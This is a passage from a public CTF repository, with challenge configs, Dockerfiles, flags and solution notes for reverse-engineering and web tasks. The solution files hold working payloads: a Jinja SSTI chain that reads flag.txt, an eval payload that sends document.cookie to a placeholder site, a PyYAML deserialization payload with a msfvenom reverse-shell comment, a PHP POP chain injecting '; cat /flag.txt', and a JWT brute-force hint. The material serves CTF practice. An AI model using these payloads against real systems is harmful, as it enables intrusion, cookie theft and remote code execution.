dist/crackme2 17 | 18 | # The state of the challenge. 19 | # If the field is omitted, the challenge is visible by default. 20 | # If provided, the field can take one of two values: hidden, visible. 21 | state: visible 22 | 23 | # Specifies what version of the challenge specification was used. 24 | # Subject to change until ctfcli v1.0.0 25 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/crackme2/dist/crackme2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/crackme2/dist/crackme2 -------------------------------------------------------------------------------- /Challenges/Rev/crackme2/solution.md: -------------------------------------------------------------------------------- 1 | Literally trivial. XOR sweep should one shot this challenge. 2 | 3 | Flag: `blahaj{r3v_15nt_7h47_h4rd!}` -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "funny cats" 2 | author: "scuffed" 3 | category: rev,foren 4 | description: Hello vros... I've made a program that generates a bunch of funny cats. That's all! There are even some sample cats that someone else generated, for your viewing pleasure. Run the `main` program to generate your own! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{STEGANOKITTIES} 13 | 14 | files: 15 | - dist/funny_cat_1.bmp 16 | - dist/funny_cat_2.bmp 17 | - dist/funny_cat_3.bmp 18 | - dist/main 19 | 20 | state: visible 21 | 22 | version: "0.1" 23 | -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/.gitignore: -------------------------------------------------------------------------------- 1 | main.spec 2 | -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/funny_cat_1.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/funny_cat_1.bmp -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/funny_cat_2.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/funny_cat_2.bmp -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/funny_cat_3.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/funny_cat_3.bmp -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/main -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/solution.md: -------------------------------------------------------------------------------- 1 | Identify that it's actually a PyInstaller program, pycdc, deobfs source code. Realise that it uses a variant of stego to store a generated key that's been RSA encrypted which is used by blowfish (ala WannaCryptor), with the RSA pem stored in cat 1, the encrypted key stored in cat 2 and the blowfish encrypted contents of passwd stored in cat 3. 2 | 3 | Flag: `blahaj{STEGANOKITTIES}` -------------------------------------------------------------------------------- /Challenges/Rev/iloveyou/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "ILOVEYOU" 2 | author: "scuffed" 3 | category: rev 4 | description: "Kindly check the attached love letter from me!\n\nDisclaimer: This challenge may trip Windows Defender or any other antivirus solution you have installed. **The file included with this challenge is perfectly safe and will not cause any impact to your computer.** It's advised to simply make an exception for this challenge rather than switching off your antivirus." 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{7hW0mP3d_tH47_PC0de_jU5T_f0r_fUN} 13 | 14 | files: 15 | - dist/LOVE_LETTER_FOR_YOU.doc 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/iloveyou/dist/LOVE_LETTER_FOR_YOU.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/iloveyou/dist/LOVE_LETTER_FOR_YOU.doc -------------------------------------------------------------------------------- /Challenges/Rev/lookma/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Look Ma, No Newlines!" 2 | author: "Java" 3 | category: rev,crypto 4 | description: print(chr(sum(range(ord(min(str(not()))))))) 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{r3v_ch41_v5_hydr4u1ic_pr3s5} 13 | 14 | files: 15 | - dist/challenge.py 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/lookma/dist/challenge.py: -------------------------------------------------------------------------------- 1 | (e:=[ord(c)-46 for c in input("What's the flag? ")],o:="".join(chr(sum((e[i]*(5**f)**i)for i in range(len(e)))%79+46)for f in range(len(e))),print(["Nope, try again.","You got it!"][o==r"OjyF9Sr@JdtZLTp7efyD`ZzQ9gS]x7\=iMM"])) -------------------------------------------------------------------------------- /Challenges/Rev/powerfulshell/solution.md: -------------------------------------------------------------------------------- 1 | Intended solve: 2 | 1. Wait for "Enter flag" prompt 3 | 2. Process hacker can just pluck the flag from memory, just search for blahaj{ 4 | 5 | Funny solve: 6 | Write script to reverse the program 7 | 8 | Funnier solve: 9 | Manually reverse all 20+ layers of encoding 10 | 11 | Flag: `blahaj{p0w3rFu1L_ShEl1}` -------------------------------------------------------------------------------- /Challenges/Rev/smuay/challenge.yml: -------------------------------------------------------------------------------- 1 | name: smuay 2 | author: warri 3 | category: rev 4 | description: | 5 | > smuay smuoy smuiy siuuuuuuuuuuu 6 | > No free smooys for you though muahahaha 7 | 8 | flags: 9 | - blahaj{0000522226522235265310522301464235652301522311056110561101111011142311153115223111534305614342222343} -------------------------------------------------------------------------------- /Challenges/Rev/smuay/dist/smuay: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/smuay/dist/smuay -------------------------------------------------------------------------------- /Challenges/Rev/smuay/sol/smuay.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/smuay/sol/smuay.i64 -------------------------------------------------------------------------------- /Challenges/Rev/timeandplace/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Time and Place" 2 | author: "scuffed" 3 | category: rev 4 | description: My Temp folder has been filled up with a bunch of empty cache directories??? And there's some weird file in there as well??? Send help pls... 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{totally_legit_temp_folders_:333} 13 | 14 | files: 15 | - dist/dist.zip 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/timeandplace/dist/dist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/timeandplace/dist/dist.zip -------------------------------------------------------------------------------- /Challenges/Rev/unsafepdf/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Unsafe PDF" 2 | author: "scuffed" 3 | category: rev 4 | description: They've put javascript in my PDF!! Get it out of there!!! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{PDF_0bj3c7_HuN7} 13 | 14 | # Link all files in dist 15 | files: 16 | - dist/silly_document.pdf 17 | 18 | # The state of the challenge. 19 | # If the field is omitted, the challenge is visible by default. 20 | # If provided, the field can take one of two values: hidden, visible. 21 | state: visible 22 | 23 | # Specifies what version of the challenge specification was used. 24 | # Subject to change until ctfcli v1.0.0 25 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/unsafepdf/dist/silly_document.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/unsafepdf/dist/silly_document.pdf -------------------------------------------------------------------------------- /Challenges/Web/README.md: -------------------------------------------------------------------------------- 1 | Web Challenges -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/challenge.yml: -------------------------------------------------------------------------------- 1 | name: SSTI-Golf 2 | author: FS 3 | category: web 4 | description: | 5 | > I got bored of code-golfing so I decided to come up with ssti-golfing. 6 | 7 | flags: 8 | - blahaj{c0nf1g_v4r14bl35_f7w} -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/dist/dist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/SSTIgolf/dist/dist.zip -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/sol.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/solve/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | payloads = [ 3 | '{{config.update({"u":config.update})}}', 4 | '{{config.u({"a":"".__class__.mro()})}}', 5 | '{{config.u({"b":"__subclasses__"})}}', 6 | '{{config.u({"c":config.a[1]})}}', 7 | '{{config.u({"d":config.c[config.b]})}}', 8 | '{{config.u({"e":config.d()[357]})}}', 9 | "{{config.e('flag.txt').read()}}" 10 | ] 11 | 12 | for i in payloads: 13 | resp=requests.post("http://127.0.0.1:8000/greet",data={"comment":i}) 14 | print(resp.content) 15 | if (b"werkzeug.routing.matcher.StateMachineMatcher" in resp.content): 16 | print(resp.content.find(b"werkzeug.routing.matcher.StateMachineMatcher")) 17 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN chmod 444 /app 17 | 18 | # configure the container to run in an executed manner 19 | ENTRYPOINT [ "python" ] 20 | 21 | CMD ["app.py" ] -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | ssti-golf: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{c0nf1g_v4r14bl35_f7w} 2 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/static/images/golf.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/SSTIgolf/src/static/images/golf.jpg -------------------------------------------------------------------------------- /Challenges/Web/babysql/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabySQL 2 | author: FS 3 | category: web 4 | description: | 5 | > Word around the corner is that a group of hackers opened up a online shop aimed at robbing people of their money. We suspect that the shop uses SQL to query it's db and we need your help to steal the admin credentials and take down the shop. 6 | 7 | flags: 8 | - blahaj{sQLi_iS_c00l} -------------------------------------------------------------------------------- /Challenges/Web/babysql/sol.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.9-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | # configure the container to run in an executed manner 17 | ENTRYPOINT [ "python" ] 18 | 19 | CMD ["app.py" ] 20 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/babysql/src/database.db -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babysql: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask~=1.1.4 2 | waitress==3.0.1 -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/schema.sql: -------------------------------------------------------------------------------- 1 | DROP TABLE IF EXISTS USERS_ZAHSHBSH; 2 | DROP TABLE IF EXISTS PRODUCTS; 3 | DROP TABLE IF EXISTS PRIV_USERS; 4 | 5 | CREATE TABLE USERS_ZAHSHBSH( 6 | id SERIAL PRIMARY KEY, 7 | username varchar(255) UNIQUE NOT NULL, 8 | password varchar(255) UNIQUE NOT NULL, 9 | is_admin INTEGER DEFAULT 0 10 | ); 11 | 12 | CREATE TABLE PRIV_USERS( 13 | id SERIAL PRIMARY KEY, 14 | username varchar(255) UNIQUE NOT NULL, 15 | password varchar(255) UNIQUE NOT NULL, 16 | is_admin INTEGER DEFAULT 1 17 | ); 18 | 19 | CREATE TABLE PRODUCTS( 20 | id SERIAL PRIMARY KEY, 21 | description varchar(255) UNIQUE NOT NULL, 22 | price varchar(255) UNIQUE NOT NULL 23 | ); -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/static/css/style.css: -------------------------------------------------------------------------------- 1 | h1 { 2 | border: 2px #eee solid; 3 | color: grey; 4 | text-align: center; 5 | padding: 10px; 6 | font-family: Arial, Helvetica, sans-serif; 7 | font-weight: normal; 8 | font-size: 20px; 9 | } -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/admin.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | ADMIN PAGE 7 | 8 | 9 | 10 |

blahaj{sQLi_iS_c00l}

11 | 12 | 13 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Blahaj Shop 7 | 8 | 9 | 10 |

Head to /login to login to product management portal or to /register to register new user

11 | 12 | 13 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/product.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Products 7 | 8 | 9 | 10 |

Welcome, {{ username }}! Browse our products below (e.g. enter blahaj to view blahaj products):

11 | 12 |
13 | 14 | 15 |
16 | 17 |
18 | {% for product in products %} 19 |
20 |

{{ product['name'] }}

21 | {{ product['name'] }} 22 |

{{ product['description'] }}

23 |

Price: {{ product['price'] }}

24 |
25 | {% endfor %} 26 |
27 | 28 | 29 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/user.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | ADMIN PAGE 7 | 8 | 9 | 10 |

You can navigate to /messages for updates from admin

11 | 12 | 13 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabySSTI 2 | author: fern 3 | category: web 4 | description: Can you hack this website and get the flag? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{SsT1_ExpL01T} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | `{{ request.__class__._load_form_data.__globals__.__builtins__.open("/app/flag.txt").read() }}` -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babyssti: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congratulations! The flag is: blahaj{SsT1_ExpL01T} -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/calculator/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Calculator 2 | author: fern 3 | category: web 4 | description: I wrote this simple calculator app! Try to hack it and steal the admin cookie! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{3VaL_i5_WeIrD} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/calculator/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Paste this command: 4 | ``` 5 | 2+2, window.location.href = `[website]`+document.cookie 6 | ``` 7 | 8 | OR: 9 | 10 | ``` 11 | [2+2, window.location.href = `[website]`+document.cookie] 12 | ``` 13 | 14 | For some weird reason, eval can take (and evaluate) >1 argument. Do note that you can also use arrays if you were unaware of that. -------------------------------------------------------------------------------- /Challenges/Web/calculator/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | RUN apk update 11 | RUN apk add chromium 12 | # install the dependencies and packages in the requirements file 13 | RUN pip install -r requirements.txt 14 | 15 | # copy every content from the local file to the image 16 | COPY . /app 17 | 18 | # configure the container to run in an executed manner 19 | ENTRYPOINT [ "python" ] 20 | 21 | CMD ["app.py" ] 22 | -------------------------------------------------------------------------------- /Challenges/Web/calculator/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | calculator: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/calculator/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/compressor/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Data compressor 2 | author: fern 3 | category: web 4 | description: Compress your JSON data with this new service! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Y4mL_n0T_S3cUre} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/compressor/soln/soln.py: -------------------------------------------------------------------------------- 1 | # msfvenom -p cmd/unix/reverse_python LHOST=[your ip] LPORT=[port] -f raw 2 | import zlib, base64 3 | hack = """!!python/object/apply:subprocess.Popen 4 | - !!python/tuple 5 | - python3 6 | - -c 7 | - "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('[SOME CODE]')[0])))" 8 | """ 9 | compressed_yaml = zlib.compress(hack.encode()) 10 | # Encode compressed YAML to Base64 11 | base64_yaml = base64.b64encode(compressed_yaml).decode() 12 | print(base64_yaml) -------------------------------------------------------------------------------- /Challenges/Web/compressor/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | See solution in `soln/`. -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | compressor: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 3 | PyYAML==6.0.1 -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/secretflag.txt: -------------------------------------------------------------------------------- 1 | blahaj{Y4mL_n0T_S3cUre} -------------------------------------------------------------------------------- /Challenges/Web/fanpage/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Blahaj Fanpage 2 | author: fern 3 | category: web 4 | description: Check out my new fanpage for Blahaj! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Jwt_BrUt3f0Rc3_9291} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/fanpage/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Bruteforce JWT, HS256 password is `i-love-shark`, can be found in rockyou.txt -------------------------------------------------------------------------------- /Challenges/Web/fanpage/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/fanpage/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | fanpage: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/fanpage/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 3 | PyJWT==2.9.0 -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Insecure Content 2 | author: hartmannsyg 3 | category: web 4 | description: Secure Content was secure, but this time its more (less) secure! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{n0t_50_s3cuRe_1sit} 13 | -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zenika/alpine-chrome:with-puppeteer 2 | 3 | 4 | COPY ./requirements.txt /app/requirements.txt 5 | # switch working directory 6 | WORKDIR /app 7 | 8 | USER root 9 | 10 | # Install python 11 | RUN apk update 12 | RUN apk add --no-cache python3 py3-pip 13 | 14 | RUN python --version 15 | RUN pip --version 16 | 17 | # install the dependencies and packages in the requirements file 18 | RUN pip install -r requirements.txt --break-system-packages 19 | 20 | 21 | # copy every content from the local file to the image 22 | COPY . /app 23 | 24 | RUN npm ci 25 | 26 | 27 | 28 | # run 29 | CMD ["python3", "app.py"] -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | insecurecontent: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "src", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "admin.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "puppeteer": "^23.6.1" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/johndoe/challenge.yml: -------------------------------------------------------------------------------- 1 | name: John Doe's Homepage 2 | author: fern 3 | category: web 4 | description: John Doe just made a new website! He hid a flag somewhere, and claims only he can access it! Can you prove him wrong and get the flag? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{x_f0rw4rD3d_F4r_wH0} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/johndoe/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | `curl http://[site]/admin -H "X-Forwarded-For: 69.42.123.69"` -------------------------------------------------------------------------------- /Challenges/Web/johndoe/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/johndoe/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | johndoe: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/johndoe/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/pkiller/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Process killer panel 2 | author: fern 3 | category: web 4 | description: I made this panel to make process management and killing so much easier! It's still not very complete, so it may have some bugs... Flag is in /flag.txt 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{p0P_Pop_cH41N} 13 | 14 | files: 15 | - dist/chal.php 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Web/pkiller/soln/soln.php: -------------------------------------------------------------------------------- 1 | isAdmin = $isAdmin; 6 | } 7 | } 8 | class addKill { 9 | function __construct($killme){ 10 | $this->killme = $killme; 11 | } 12 | } 13 | class MainClass { 14 | function __construct(){ 15 | $this->name = new KillerJob(true); 16 | } 17 | } 18 | echo base64_encode(serialize(array(new addKill("; cat /flag.txt"), new MainClass()))); 19 | ?> 20 | -------------------------------------------------------------------------------- /Challenges/Web/pkiller/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | PHP pop chain, look in `soln/` -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.2-apache 2 | COPY src/ /var/www/html/ 3 | COPY src/flag.txt /flag.txt 4 | #COPY src/000-default.conf /etc/apache2/000-default.conf 5 | COPY src/000-default.conf /etc/apache2/sites-available/000-default.conf 6 | COPY src/ports.conf /etc/apache2/ports.conf 7 | RUN adduser --uid 1001 --disabled-password nonroot 8 | USER 1001 9 | EXPOSE 8000 10 | CMD ["apache2-foreground"] -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | pkiller: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/src/.htaccess: -------------------------------------------------------------------------------- 1 | DirectoryIndex index.php -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{p0P_Pop_cH41N} -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/src/ports.conf: -------------------------------------------------------------------------------- 1 | 2 | Listen 8000 3 | 4 | 5 | Listen 443 6 | 7 | 8 | 9 | Listen 443 10 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Screenshooter 2 | author: fern 3 | category: web 4 | description: I made an epic new website to take screenshots! Check it out! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{fL45k_D3veL0p0r} 13 | 14 | files: 15 | - dist/app.py 16 | - dist/requirements.txt 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 